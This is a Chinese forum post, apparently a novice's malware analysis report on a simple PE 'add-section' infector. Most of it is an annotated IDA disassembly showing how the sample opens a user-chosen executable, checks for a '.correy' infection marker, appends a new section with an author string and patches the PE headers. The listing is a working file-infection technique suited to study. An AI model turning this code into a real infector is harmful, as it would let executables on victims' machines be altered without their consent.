发布于2022年11月8日3年前 菜鸟的病毒分析基本信息 报告名称:简单pe添加节病毒分析 作者: 报告更新日期: 2012.07.08 样本发现日期: 样本类型: 样本文件大小/被感染文件变化长度: 样本文件MD5 校验值: 样本文件SHA1 校验值: 壳信息: 可能受到威胁的系统: Microsoft Windows NT 4.0Microsoft Windows NT 4.0 Terminal Services EditionMicrosoft Windows 2000Microsoft Windows XPMicrosoft Windows Server 2003Microsoft Windows vistaMicrosoft Windows 7 相关漏洞: 已知检测名称: 简介pe文件感染病毒 被感染系统及网络症状 文件系统变化伪装的windows对话框 用户选择的文件将被修改 注册表变化 详细分析/功能介绍1.程序运行后弹出选择文件的对话框2.选择完毕,程序获取文件路径,打开文件创建映射3.获取入口地址,头的大小,节的数量,对其粒子等信息4.判断能否直接添加一个节,如果不能处理节表后面得数据5.添加一个节,写入节的相关信息6.改写pe文件大小,节的数量7.关闭结束进程 预防及修复措施运行程序前查看程序是否安全,安装杀软 技术热点及总结对于我这个菜鸟来说还是有很多值得学习的地方,伪装UI的api,getopenfilename以及结构LPOPENFILENAMEgetopenfilename该函数创建一个Open公共对话框,使用户指定驱动器、目录和文件名、或使用户打开文件。如果用户指定了一个文件名,点击OK按钮,返回值为非零。由OPENFILENAME结构的IPstrFile成员指向的缓冲区含有全路径和用户指定的文件名。如果用户取消或关闭Open对话框或错误出现,返回值为零。OPENFILENAME结构包含了GetOpenFileName和GetSaveFileName函数用来初始化打开或另存为对话框的信息。在用户关闭对话框后,系统返回关于用户的选择信息到这个结构中。 在程序中不仅要获得映射后的数据地址还要获得相对便宜,因为在写文件前移动指针的时候这个很重要。反汇编代码: 返回对其大小的函数.text:00401000 ; Attributes: bp-based frame.text:00401000.text:00401000 sub_401000 proc near ; CODE XREF: start+2F7p.text:00401000 ; start+32Bp ....text:00401000.text:00401000 arg_0 = dword ptr 8.text:00401000 arg_4 = dword ptr 0Ch.text:00401000.text:00401000 push ebp.text:00401001 mov ebp, esp.text:00401003 push edx.text:00401004 mov eax, [ebp+arg_0].text:00401007 xor edx, edx.text:00401009 div [ebp+arg_4].text:0040100C cmp edx, 0.text:0040100F jz short loc_401012.text:00401011 inc eax.text:00401012.text:00401012 loc_401012: ; CODE XREF: sub_401000+Fj.text:00401012 mul [ebp+arg_4].text:00401015 pop edx.text:00401016 leave.text:00401017 retn 8.text:00401017 sub_401000 endp.text:00401017入口函数伪装ui.text:0040101A.text:0040101A public start.text:0040101A start proc near.text:0040101A mov OpenFileNAme.lStructSize, 4Ch.text:00401024 mov OpenFileNAme.lpstrFilter, offset aPeFile_exe_dll ; "pe File (*.exe, *.dll)".text:0040102E mov OpenFileNAme.lpstrFile, offset NumberOfBytesWritten.text:00401038 mov OpenFileNAme.nMaxFile, 200h ; lpfile返回用户的选择信息 即被选择的文件路径.text:00401042 mov OpenFileNAme.Flags, 281804h.text:0040104C push offset OpenFileNAme ; LPOPENFILENAMEA.text:00401051 call GetOpenFileNameA ; 创建open公共对话框打开文件创建映射.text:00401056 push 0 ; hTemplateFile.text:00401058 push 80h ; dwFlagsAndAttributes.text:0040105D push 3 ; dwCreationDisposition.text:0040105F push 0 ; lpSecurityAttributes.text:00401061 push 3 ; dwShareMode.text:00401063 push 0C0000000h ; dwDesiredAccess.text:00401068 push offset NumberOfBytesWritten ; lpFileName.text:0040106D call CreateFileA ; 打开选择的文件.text:00401072 mov hFile, eax.text:00401077 push 0 ; lpName.text:00401079 push 0 ; dwMaximumSizeLow.text:0040107B push 0 ; dwMaximumSizeHigh.text:0040107D push 2 ; flProtect.text:0040107F push 0 ; lpFileMappingAttributes.text:00401081 push eax ; hFile.text:00401082 call CreateFileMappingA.text:00401087 push 0 ; dwNumberOfBytesToMap.text:00401089 push 0 ; dwFileOffsetLow.text:0040108B push 0 ; dwFileOffsetHigh.text:0040108D push 4 ; dwDesiredAccess.text:0040108F push eax ; hFileMappingObject.text:00401090 call MapViewOfFile.text:00401095 mov map_address, eax ; 创建文件映像 返回映射地址获取pe文件信息.text:0040109A mov esi, map_address.text:004010A0 add esi, 3Ch.text:004010A3 mov esi, [esi].text:004010A5 mov peheader_rva, esi.text:004010AB mov eax, map_address.text:004010B0 add esi, eax.text:004010B2 mov peheader, esi.text:004010B8 mov esi, peheader.text:004010BE add esi, 6.text:004010C1 mov dx, [esi].text:004010C4 movsx edx, dx.text:004010C7 mov section_number, edx.text:004010CD mov esi, peheader.text:004010D3 add esi, 18h.text:004010D6 mov option_header, esi.text:004010DC mov esi, peheader.text:004010E2 add esi, 14h.text:004010E5 mov dx, [esi].text:004010E8 movsx edx, dx.text:004010EB mov sizeof_optionheader, edx.text:004010F1 mov esi, peheader.text:004010F7 add esi, 54h.text:004010FA mov esi, [esi].text:004010FC mov check_sum, esi.text:00401102 mov eax, map_address.text:00401107 add eax, check_sum.text:0040110D mov map_address_csum, eax.text:00401112 mov esi, peheader.text:00401118 add esi, 38h.text:0040111B mov esi, [esi].text:0040111D mov sectionalign, esi.text:00401123 mov esi, peheader.text:00401129 add esi, 3Ch.text:0040112C mov esi, [esi].text:0040112E mov filealign, esi.text:00401134 mov esi, option_header.text:0040113A add esi, sizeof_optionheader.text:00401140 mov sectiontable, esi.text:00401146 mov eax, 28h.text:0040114B mov ebx, section_number.text:00401151 mul ebx.text:00401153 add eax, sectiontable.text:00401159 mov sectionbackadress, eax ; 节的尾部地址.text:0040115E sub eax, map_address.text:00401164 mov lDistanceToMove, eax ; 相对偏移.text:00401169 mov eax, sectionbackadress.text:0040116E sub eax, 28h.text:00401171 mov esi, eax.text:00401173 lea edi, a_correy ; ".correy ".text:00401179 mov ecx, 8.text:0040117E repe cmpsb感染标志最后一个节的名字.text:00401180 jz loc_401528 ; 比较最后一个节的名字,是否为。correy.text:00401180 ; 如果是结束.text:00401186 lea esi, OpenFileNAme.pvReserved.text:0040118C mov eax, map_address.text:00401191 add eax, lDistanceToMove.text:00401197 mov edi, eax.text:00401199 mov ecx, 28h.text:0040119E repe cmpsb ; 比较新节位置是否符合要求.text:004011A0 jz loc_401278 ; 符合要求 添加节处理节表尾数据.text:004011A6 mov eax, check_sum ; 不符合要求先处理节表后面的数据 在进行添加节.text:004011AB sub eax, lDistanceToMove.text:004011B1 mov chsum_rvalast, eax.text:004011B6 mov ecx, eax.text:004011B8 mov eax, map_address.text:004011BD add eax, check_sum.text:004011C3 mov esi, eax.text:004011C5 lea edi, unk_403278.text:004011CB.text:004011CB loc_4011CB: ; CODE XREF: start+1BBj.text:004011CB dec esi.text:004011CC inc edi.text:004011CD mov bl, [esi].text:004011CF mov [edi], bl.text:004011D1 dec ecx.text:004011D2 cmp ecx, 0.text:004011D5 jnz short loc_4011CB.text:004011D7 mov ecx, 0FFFFFFFFh.text:004011DC lea esi, unk_403278.text:004011E2.text:004011E2 loc_4011E2: ; CODE XREF: start+1CEj.text:004011E2 inc esi.text:004011E3 inc ecx.text:004011E4 mov al, [esi].text:004011E6 cmp al, 0.text:004011E8 jz short loc_4011E2.text:004011EA cmp ecx, 28h.text:004011ED jb loc_40153A.text:004011F3 mov dword_403ABA, ecx.text:004011F9 mov eax, chsum_rvalast.text:004011FE sub eax, ecx.text:00401200 mov nNumberOfBytesToWrite, eax.text:00401205 mov ecx, chsum_rvalast.text:0040120B inc ecx.text:0040120C mov eax, map_address.text:00401211 add eax, lDistanceToMove.text:00401217 mov esi, eax.text:00401219 lea edi, unk_40367B.text:0040121F dec esi.text:00401220 dec edi.text:00401221.text:00401221 loc_401221: ; CODE XREF: start+211j.text:00401221 inc esi.text:00401222 inc edi.text:00401223 mov bl, [esi].text:00401225 mov [edi], bl.text:00401227 dec ecx.text:00401228 cmp ecx, 0.text:0040122B jnz short loc_401221.text:0040122D push 0 ; dwMoveMethod.text:0040122F push 0 ; lpDistanceToMoveHigh.text:00401231 push lDistanceToMove ; lDistanceToMove.text:00401237 push hFile ; hFile.text:0040123D call SetFilePointer.text:00401242 push 0 ; lpOverlapped.text:00401244 push offset NumberOfBytesWritten ; lpNumberOfBytesWritten.text:00401249 push 28h ; nNumberOfBytesToWrite.text:0040124B push offset unk_403150 ; lpBuffer.text:00401250 push hFile ; hFile.text:00401256 call WriteFile.text:0040125B push 0 ; lpOverlapped.text:0040125D push offset NumberOfBytesWritten ; lpNumberOfBytesWritten.text:00401262 push nNumberOfBytesToWrite ; nNumberOfBytesToWrite.text:00401268 push offset unk_40367B ; lpBuffer.text:0040126D push hFile ; hFile.text:00401273 call WriteFile.text:00401278.text:00401278 loc_401278: ; CODE XREF: start+186j添加节头.text:00401278 mov eax, peheader_rva.text:0040127D add eax, 6.text:00401280 push 0 ; dwMoveMethod.text:00401282 push 0 ; lpDistanceToMoveHigh.text:00401284 push eax ; lDistanceToMove.text:00401285 push hFile ; hFile.text:0040128B call SetFilePointer.text:00401290 inc section_number.text:00401296 push 0 ; lpOverlapped.text:00401298 push offset NumberOfBytesWritten ; lpNumberOfBytesWritten.text:0040129D push 2 ; nNumberOfBytesToWrite.text:0040129F push offset section_number ; lpBuffer.text:004012A4 push hFile ; hFile.text:004012AA call WriteFile ; 更改节的数量加1.text:004012AF push 0 ; dwMoveMethod.text:004012B1 push 0 ; lpDistanceToMoveHigh.text:004012B3 push lDistanceToMove ; lDistanceToMove.text:004012B9 push hFile ; hFile.text:004012BF call SetFilePointer ; 指针移动到新的节准备写数据.text:004012C4 push 0 ; lpOverlapped.text:004012C6 push offset NumberOfBytesWritten ; lpNumberOfBytesWritten.text:004012CB push 8 ; nNumberOfBytesToWrite.text:004012CD push offset a_correy ; ".correy ".text:004012D2 push hFile ; hFile.text:004012D8 call WriteFile ; 写入前节名.text:004012DD push offset String ; "made by correy QQ:112426112 Email:legua"....text:004012E2 call lstrlenA.text:004012E7 mov nNumberOfBytesToWrite, eax.text:004012EC push 0 ; lpOverlapped.text:004012EE push offset NumberOfBytesWritten ; lpNumberOfBytesWritten.text:004012F3 push 4 ; nNumberOfBytesToWrite.text:004012F5 push offset nNumberOfBytesToWrite ; lpBuffer.text:004012FA push hFile ; hFile.text:00401300 call WriteFile ; 写入上面的数据大小 即节的大小.text:00401305 push sectionalign.text:0040130B push nNumberOfBytesToWrite.text:00401311 call sub_401000 ; 返回对其大小.text:00401316 mov dword_403AD2, eax.text:0040131B mov eax, sectionbackadress.text:00401320 sub eax, 1Ch.text:00401323 mov eax, [eax].text:00401325 mov dword_403ABA, eax.text:0040132A mov eax, sectionbackadress.text:0040132F sub eax, 20h.text:00401332 mov eax, [eax].text:00401334 mov nNumberOfBytesToWrite, eax.text:00401339 push sectionalign.text:0040133F push nNumberOfBytesToWrite.text:00401345 call sub_401000 ; 返回对其大小.text:0040134A add eax, dword_403ABA.text:00401350 mov dword_403ABA, eax.text:00401355 push 0 ; lpOverlapped.text:00401357 push offset NumberOfBytesWritten ; lpNumberOfBytesWritten.text:0040135C push 4 ; nNumberOfBytesToWrite.text:0040135E push offset dword_403ABA ; lpBuffer.text:00401363 push hFile ; hFile.text:00401369 call WriteFile ; 计算对其内存大小 并写入数据.text:0040136E push filealign.text:00401374 push nNumberOfBytesToWrite.text:0040137A call sub_401000 ; 返回对其大小.text:0040137F mov dword_403AC6, eax.text:00401384 push 0 ; lpOverlapped.text:00401386 push offset NumberOfBytesWritten ; lpNumberOfBytesWritten.text:0040138B push 4 ; nNumberOfBytesToWrite.text:0040138D push offset dword_403AC6 ; lpBuffer.text:00401392 push hFile ; hFile.text:00401398 call WriteFile.text:0040139D mov eax, sectionbackadress.text:004013A2 sub eax, 14h.text:004013A5 mov eax, [eax].text:004013A7 mov nNumberOfBytesToWrite, eax.text:004013AC mov eax, sectionbackadress.text:004013B1 sub eax, 18h.text:004013B4 mov eax, [eax].text:004013B6 add eax, nNumberOfBytesToWrite.text:004013BC mov dword_403AC2, eax.text:004013C1 push 0 ; lpOverlapped.text:004013C3 push offset NumberOfBytesWritten ; lpNumberOfBytesWritten.text:004013C8 push 4 ; nNumberOfBytesToWrite.text:004013CA push offset dword_403AC2 ; lpBuffer.text:004013CF push hFile ; hFile.text:004013D5 call WriteFile ; 写入磁盘偏移.text:004013DA mov eax, lDistanceToMove.text:004013DF add eax, 24h.text:004013E2 push 0 ; dwMoveMethod.text:004013E4 push 0 ; lpDistanceToMoveHigh.text:004013E6 push eax ; lDistanceToMove.text:004013E7 push hFile ; hFile.text:004013ED call SetFilePointer.text:004013F2 push 0 ; lpOverlapped.text:004013F4 push offset NumberOfBytesWritten ; lpNumberOfBytesWritten.text:004013F9 push 4 ; nNumberOfBytesToWrite.text:004013FB push offset asc_403082 ; " ".text:00401400 push hFile ; hFile.text:00401406 call WriteFile ; 写入节的属性.text:0040140B mov eax, peheader.text:00401410 add eax, 1Ch.text:00401413 mov eax, [eax].text:00401415 add eax, dword_403AC6.text:0040141B mov newfilesize, eax.text:00401420 mov ebx, peheader_rva.text:00401426 add ebx, 1Ch.text:00401429 push 0 ; dwMoveMethod.text:0040142B push 0 ; lpDistanceToMoveHigh.text:0040142D push ebx ; lDistanceToMove.text:0040142E push hFile ; hFile.text:00401434 call SetFilePointer.text:00401439 push 0 ; lpOverlapped.text:0040143B push offset NumberOfBytesWritten ; lpNumberOfBytesWritten.text:00401440 push 4 ; nNumberOfBytesToWrite.text:00401442 push offset newfilesize ; lpBuffer.text:00401447 push hFile ; hFile.text:0040144D call WriteFile ; 改写新的文件大小.text:00401452 mov eax, peheader.text:00401457 add eax, 50h.text:0040145A mov eax, [eax].text:0040145C add eax, dword_403AD2.text:00401462 mov dword_403ACE, eax.text:00401467 mov ebx, peheader_rva.text:0040146D add ebx, 50h.text:00401470 push 0 ; dwMoveMethod.text:00401472 push 0 ; lpDistanceToMoveHigh.text:00401474 push ebx ; lDistanceToMove.text:00401475 push hFile ; hFile.text:0040147B call SetFilePointer.text:00401480 push 0 ; lpOverlapped.text:00401482 push offset NumberOfBytesWritten ; lpNumberOfBytesWritten.text:00401487 push 4 ; nNumberOfBytesToWrite.text:00401489 push offset dword_403ACE ; lpBuffer.text:0040148E push hFile ; hFile.text:00401494 call WriteFile ; 修改sizeofheader.text:00401499 push 0 ; dwMoveMethod.text:0040149B push 0 ; lpDistanceToMoveHigh.text:0040149D push dword_403AC2 ; lDistanceToMove.text:004014A3 push hFile ; hFile写文件.text:004014A9 call SetFilePointer.text:004014AE push 0 ; lpOverlapped.text:004014B0 push offset NumberOfBytesWritten ; lpNumberOfBytesWritten.text:004014B5 push 55h ; nNumberOfBytesToWrite.text:004014B7 push offset String ; "made by correy QQ:112426112 Email:legua"....text:004014BC push hFile ; hFile.text:004014C2 call WriteFile.text:004014C7 mov eax, dword_403AC6.text:004014CC add eax, dword_403AC2.text:004014D2 push eax.text:004014D3 push 0 ; dwMoveMethod.text:004014D5 push 0 ; lpDistanceToMoveHigh.text:004014D7 push eax ; lDistanceToMove.text:004014D8 push hFile ; hFile.text:004014DE call SetFilePointer.text:004014E3 pop eax.text:004014E4 sub eax, 55h.text:004014E7 push 0 ; dwMoveMethod.text:004014E9 push 0 ; lpDistanceToMoveHigh.text:004014EB push eax ; lDistanceToMove.text:004014EC push hFile ; hFile.text:004014F2 call SetFilePointer.text:004014F7 push 0 ; lpOverlapped.text:004014F9 push offset NumberOfBytesWritten ; lpNumberOfBytesWritten.text:004014FE push 55h ; nNumberOfBytesToWrite.text:00401500 push offset String ; "made by correy QQ:112426112 Email:legua"....text:00401505 push hFile ; hFile.text:0040150B call WriteFile ; 写文件.text:00401510 push hFile ; hFile.text:00401516 call FlushFileBuffers.text:0040151B push hFile ; hObject.text:00401521 call CloseHandle.text:00401526 jmp short loc_40154A.text:00401528 ; ---------------------------------------------------------------------------.text:00401528.text:00401528 loc_401528: ; CODE XREF: start+166j.text:00401528 push 0 ; uType.text:0040152A push 0 ; lpCaption.text:0040152C push offset Text ; "文?.text:00401531 push 0 ; hWnd.text:00401533 call MessageBoxA.text:00401538 jmp short loc_40154A.text:0040153A ; ---------------------------------------------------------------------------.text:0040153A.text:0040153A loc_40153A: ; CODE XREF: start+1D3j.text:0040153A push 0 ; uType.text:0040153C push 0 ; lpCaption.text:0040153E push offset asc_403086 ; "节头?.text:00401543 push 0 ; hWnd.text:00401545 call MessageBoxA.text:0040154A.text:0040154A loc_40154A: ; CODE XREF: start+50Cj.text:0040154A ; start+51Ej.text:0040154A push 0 ; uExitCode.text:0040154C call ExitProcess.text:0040154C start endp
创建帐户或登录后发表意见